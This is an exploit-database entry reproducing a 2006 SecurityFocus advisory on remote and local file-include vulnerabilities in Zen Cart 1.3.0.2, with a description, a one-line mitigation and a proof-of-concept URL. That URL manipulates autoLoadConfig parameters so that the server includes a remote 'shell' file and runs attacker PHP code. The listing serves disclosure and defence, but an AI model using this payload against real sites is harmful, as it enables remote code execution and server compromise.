header-logo
Suggest Exploit
vendor:
Zen Cart
by:
SecurityFocus
7.5
CVSS
HIGH
Remote and Local File-Include Vulnerabilities
94
CWE
Product Name: Zen Cart
Affected Version From: 1.3.0.2
Affected Version To: 1.3.0.2
Patch Exists: YES
Related CWE: N/A
CPE: Zen Cart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Zen Cart Multiple Remote and Local File-Include Vulnerabilities

Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that user-supplied data does not include malicious commands or scripts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19543/info

Zen Cart is prone to multiple remote and local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote and local files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect version 1.3.0.2 and prior; other versions may also be vulnerable.

http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell